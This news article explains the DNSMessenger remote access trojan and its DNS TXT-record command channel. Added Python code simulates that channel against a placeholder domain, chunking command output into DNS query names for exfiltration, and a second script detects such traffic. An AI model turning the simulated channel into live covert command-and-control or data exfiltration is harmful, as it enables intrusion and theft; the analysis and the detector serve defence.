It is no secret that cybercriminals are becoming more adept, innovative, and stealthy with each passing day.
While new forms of cybercrime are on the rise, traditional activity also seems to be shifting toward more covert techniques that abuse standard system tools and protocols, which are not always monitored.
The latest example of such an attack is DNSMessenger, a new Remote Access Trojan (RAT) that uses DNS queries to deliver malicious PowerShell commands to compromised computers, a technique that makes the RAT difficult to detect on targeted systems.
The Trojan came to the attention of Cisco's Talos threat research group through a security researcher named Simpo, who highlighted a tweet showing encoded text in a PowerShell script that read 'SourceFireSux.' SourceFire is one of Cisco's corporate security products.
DNSMessenger Attack Is Completely Fileless
Further analysis of the malware ultimately led Talos researchers to discover a sophisticated attack comprising a malicious Word document and a PowerShell backdoor that communicates with its command-and-control servers via DNS requests.
Distributed through an email phishing campaign, the DNSMessenger attack is fileless in the sense that its payload is never written to disk on the targeted system; instead, it uses DNS TXT records to fetch malicious PowerShell commands that the attackers store remotely in those records. (The persistence mechanism described below does leave traces in the Windows Registry and WMI, so "fileless" applies to the payload, not to every artifact.)
This characteristic makes it very hard for conventional, file-scanning anti-malware defenses to catch.
PowerShell is a powerful scripting language built into Windows that allows for the automation of system management tasks.
The malicious Word document has been crafted "to appear as if it were associated with a secure email service that is secured by McAfee," according to a blog post published by Talos researchers Edmund Brumaghin and Colin Grady on Thursday.
Here's How the DNSMessenger ready on Works:
When opened, the document launches a Visual Basic for Applications (VBA) macro that executes a self-contained PowerShell script in an effort to run the backdoor on the target system.
What's interesting? Everything up to this point is done in memory, without writing any malicious files to the system's disk.
Next, the VBA script unpacks a compressed and sophisticated second stage of PowerShell, which checks several parameters of the target environment, such as the privileges of the logged-in user and the version of PowerShell installed on the target system.
This information is then used to establish persistence on the infected host by modifying the Windows Registry and installing a third-stage PowerShell script that contains a simple backdoor.
If the victim has administrative access, the backdoor is also added to the Windows Management Instrumentation (WMI) database, allowing it to survive on the system even after a reboot.
The backdoor is an additional script that establishes a sophisticated two-way communication channel over the Domain Name System (DNS), which is normally used to look up the IP addresses associated with domain names but supports other record types as well.
The DNSMessenger backdoor uses DNS TXT records, which by definition allow a DNS server to attach unformatted text to a response.
The backdoor periodically sends DNS queries to one of a series of domains hard-coded in its source code. As part of those requests, it retrieves the domain's DNS TXT record, which contains further PowerShell commands that are executed but never written to the local system.
This "fourth stage" PowerShell script is the actual remote control tool used by the attacker.
The script queries the command-and-control servers via DNS TXT requests to ask what commands to execute. Any command received is then executed, and the output is communicated back to the C&C server, allowing the attacker to run any Windows or application command on the infected system.
All the attackers need to do is place malicious commands and instructions in the TXT records of their domains; when queried, those commands are executed via the Windows command line processor, and the output is sent back as another DNS query.
The domains used by the DNSMessenger operators are all down, so it is not yet known what types of commands the attackers relayed to infected systems. However, the researchers state that this particular RAT was used in a small number of targeted attacks.
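To make the fourth-stage exchange concrete, here is an added simulation of a DNS TXT command channel of the kind described above. It is illustrative code written for this article, not DNSMessenger's own: the authoritative server is an in-memory dictionary, command execution is a lookup table rather than cmd.exe, and c2.example.invalid is an assumed placeholder domain. What it does show is the part the text glosses over: commands arrive as a TXT record, and the output travels back purely inside query names, which is why it has to be chunked to the 63-character label and 253-character name limits of DNS.

```python
"""Simulated DNS TXT command channel of the kind the article describes.

Added illustration, not DNSMessenger's own code: the authoritative server is
an in-memory dict, command execution is a lookup table instead of cmd.exe, and
c2.example.invalid is an assumed placeholder domain.
"""
import base64

C2_DOMAIN = "c2.example.invalid"   # assumed placeholder
MAX_LABEL = 63                      # RFC 1035: one label is at most 63 octets
MAX_NAME = 253                      # RFC 1035: a full name in text form is at most 253 characters

# ---- attacker side: a zone whose TXT records carry commands ----
zone = {}            # qname -> list of TXT strings (stands in for the authoritative server)
queries_seen = []    # every qname the "server" received; uploads arrive as queries

def publish_command(session, command):
    """Put a base64-encoded command in the TXT record of <session>.<C2_DOMAIN>."""
    zone[f"{session}.{C2_DOMAIN}"] = [base64.b64encode(command.encode()).decode()]

def resolve_txt(qname):
    """Stand-in for a TXT lookup. A real C2 server logs the query name, which is the upload."""
    queries_seen.append(qname)
    return zone.get(qname, [])

def reassemble(qnames, session):
    """Rebuild command output from upload query names: <seq>.<data labels>.<session>.<C2_DOMAIN>."""
    suffix = f".{session}.{C2_DOMAIN}"
    parts = []
    for name in qnames:
        if not name.endswith(suffix):
            continue
        seq, _, data = name[:-len(suffix)].partition(".")
        parts.append((int(seq), data.replace(".", "")))
    text = "".join(data for _, data in sorted(parts)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))

# ---- victim side: beacon that fetches a TXT record, "runs" it, sends output back as queries ----
FAKE_SHELL = {                      # constructed stand-in for cmd.exe output
    "whoami": "corp\\jdoe",
    "hostname": "WS-042",
    "tasklist": "\n".join(f"proc{i}.exe  {1000 + i}" for i in range(60)),
}

def upload_names(session, output):
    """Chunk output into DNS names that respect the 63-char label and 253-char name limits."""
    text = base64.b32encode(output).decode().rstrip("=").lower()   # base32 is a DNS-safe alphabet
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    suffix = f".{session}.{C2_DOMAIN}"
    names, seq = [], 0
    while labels:
        chunk = [labels.pop(0)]                      # at least one data label per query
        while labels and len(f"{seq}.") + len(".".join(chunk + labels[:1])) + len(suffix) <= MAX_NAME:
            chunk.append(labels.pop(0))
        names.append(f"{seq}." + ".".join(chunk) + suffix)
        seq += 1
    return names

def beacon(session):
    """One beacon cycle: poll for a command, execute (simulated), exfiltrate output via queries."""
    txt = resolve_txt(f"{session}.{C2_DOMAIN}")
    if not txt:
        return None                                  # no tasking yet; a real implant sleeps and retries
    command = base64.b64decode("".join(txt)).decode()
    output = FAKE_SHELL.get(command, f"'{command}' is not recognized as a command")
    for name in upload_names(session, output.encode()):
        resolve_txt(name)                            # the answer is irrelevant; the name is the payload
    return command, output

if __name__ == "__main__":
    publish_command("s1", "tasklist")
    command, output = beacon("s1")
    uploads = [q for q in queries_seen if q.endswith(".s1." + C2_DOMAIN)]
    print(f"{command!r} -> {len(output)} bytes of output carried in {len(uploads)} DNS queries")
    assert reassemble(uploads, "s1").decode() == output
```

Note what the resolver in the middle sees: one TXT query per poll, followed by a burst of long, high-entropy names under the same domain whenever a command produces output. That traffic shape, rather than any file on disk, is the observable artifact of this design.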
"This malware sample is an excellent example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting," the Talos researchers said.
"It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure."

This is not the first time researchers have come across fileless malware. Early last month, Kaspersky researchers also discovered fileless malware that resides solely in the memory of compromised computers, targeting banks, telecommunications companies, and government organizations in 40 countries.
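The Talos point that DNS must be treated as a C2 channel is actionable: the traffic pattern described in this article (periodic TXT queries to a fixed domain, plus many long, random-looking subdomains carrying the output) can be hunted in ordinary query logs. The following is an added example written for this article, not Talos's detection content. It runs over a constructed log whose lines take the form "<ISO timestamp> <client> <qtype> <qname>"; in a real deployment you would feed it resolver logs or Sysmon event 22 (DnsQuery) records and tune the thresholds. The registered-domain helper simply takes the last two labels, which is an assumption that a public-suffix list would replace in production.

```python
"""Heuristic hunt for DNS-carried command channels in query logs.

Added example, not Talos's detection content. It reads a constructed log whose
lines look like "<ISO timestamp> <client> <qtype> <qname>"; in practice you would
feed it resolver logs or Sysmon event 22 (DnsQuery) and tune the thresholds.
"""
import hashlib
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from math import log2
from statistics import mean, pstdev

def shannon_entropy(text):
    """Bits per character; random base32/base64 labels score high, words score low."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(text) * log2(c / len(text)) for c in counts.values())

def registered_domain(qname):
    """Last two labels. Assumption: no public-suffix list, so co.uk-style names need a real one."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def parse_line(line):
    ts, client, qtype, qname = line.split()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), client, qtype.upper(), qname.lower()

def analyze(lines, min_txt=5, min_subdomains=5, min_avg_len=40, min_entropy=3.0, max_jitter=0.25):
    """Return one finding per registered domain whose traffic looks like a TXT-record C2 channel."""
    per_domain = defaultdict(list)
    for line in lines:
        if line.strip() and not line.startswith("#"):
            rec = parse_line(line)
            per_domain[registered_domain(rec[3])].append(rec)

    findings = []
    for domain, recs in per_domain.items():
        txt = sum(1 for r in recs if r[2] == "TXT")
        subs = {r[3][:-len(domain) - 1] for r in recs if len(r[3]) > len(domain) + 1}
        times = sorted(r[0] for r in recs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]

        reasons = []
        if txt >= min_txt:
            reasons.append(f"{txt} TXT queries")
        if len(subs) >= min_subdomains and mean(len(s) for s in subs) >= min_avg_len:
            reasons.append(f"{len(subs)} unique long subdomains")
        if subs and mean(shannon_entropy(s.replace(".", "")) for s in subs) >= min_entropy:
            reasons.append("high-entropy subdomains")
        if len(gaps) >= 2 and mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            reasons.append(f"regular beacon interval (~{mean(gaps):.0f}s)")
        # TXT traffic alone is normal (SPF, DKIM, domain verification): require TXT plus one more indicator
        if txt >= min_txt and len(reasons) >= 2:
            findings.append({"domain": domain, "clients": sorted({r[1] for r in recs}), "reasons": reasons})
    return findings

def constructed_log():
    """Constructed sample, not real telemetry: routine lookups plus a TXT beacon every ~60 s."""
    base = datetime(2017, 3, 2, 14, 0, 0, tzinfo=timezone.utc)
    events = [
        (5, "10.0.0.5", "A", "www.google.com"),
        (47, "10.0.0.7", "A", "mail.google.com"),
        (130, "10.0.0.5", "AAAA", "www.google.com"),
        (300, "10.0.0.9", "TXT", "example.com"),        # an SPF lookup by the mail gateway
        (412, "10.0.0.5", "A", "login.microsoftonline.com"),
    ]
    for i, off in enumerate([0, 60, 121, 179, 240, 302, 359, 420, 481]):   # ~60 s with jitter
        label = hashlib.sha256(f"beacon{i}".encode()).hexdigest()[:48]     # stands in for encoded output
        events.append((off, "10.0.0.5", "TXT", f"{label}.c2.example.invalid"))
    return [f"{(base + timedelta(seconds=off)).isoformat()} {client} {qtype} {qname}"
            for off, client, qtype, qname in sorted(events)]

if __name__ == "__main__":
    for finding in analyze(constructed_log()):
        print(finding["domain"], finding["clients"], "; ".join(finding["reasons"]))
```

The requirement for TXT volume plus at least one further indicator is deliberate: mail gateways legitimately issue TXT queries for SPF and DKIM, so TXT alone would be noisy, whereas TXT combined with long high-entropy subdomains or a metronomic query interval is rare in benign traffic.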